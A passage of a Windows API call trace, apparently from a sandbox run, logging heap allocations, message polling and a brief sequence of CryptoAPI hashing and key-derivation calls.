hHeap=0x8a0000) returned 1 [0169.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0169.231] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0169.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0169.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0169.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0169.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0169.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0169.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0169.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0169.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0169.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0169.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0169.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0169.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0169.233] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0169.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0169.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0169.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0169.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0169.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0169.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0169.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0169.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0169.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0169.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0169.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0169.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0169.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0169.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0169.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0169.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0169.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0169.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0169.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0169.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0169.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0169.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0169.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0169.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0169.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0169.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0169.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0169.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0169.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x9bd858, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0169.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0169.235] GetProcAddress (hModule=0x74f20000, lpProcName="CryptCreateHash") returned 0x74f2df4e [0169.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0169.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0169.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0169.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0169.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0169.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0169.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0169.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0169.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0169.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0169.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0169.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0169.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0169.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0169.235] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0169.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0169.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0169.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0169.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0169.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0169.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0169.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0169.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0169.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0169.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0169.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0169.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0169.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0169.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0169.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0169.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0169.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0169.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0169.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0169.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0169.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0169.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0169.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0169.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0169.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0169.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0169.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0169.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0169.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0169.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0169.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0169.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0169.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0169.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0169.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0169.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0169.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0169.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0169.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0169.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0169.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0169.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0169.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0169.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0169.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0169.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0169.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0169.252] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.252] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.252] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.252] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.252] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0169.252] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.252] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.252] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0169.252] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0169.252] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.562] CryptHashData (hHash=0x90af58, pbData=0x8df028, dwDataLen=0x19, dwFlags=0x1) returned 1 [0170.562] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 1 [0170.563] TranslateMessage (lpMsg=0x87ee3c) returned 0 [0170.563] DispatchMessageW (lpMsg=0x87ee3c) returned 0x0 [0170.563] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e4d8) returned 1 [0170.564] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0170.564] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0170.564] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.564] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.564] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.564] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.564] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.564] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0170.564] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0170.564] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.564] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0170.565] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.565] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.565] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.565] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.565] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.565] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0170.565] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0170.565] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0170.565] CryptDestroyHash (hHash=0x90af58) returned 1 [0170.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0170.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0170.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0170.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0170.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0170.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0170.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0170.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0170.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0170.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0170.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0170.566] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 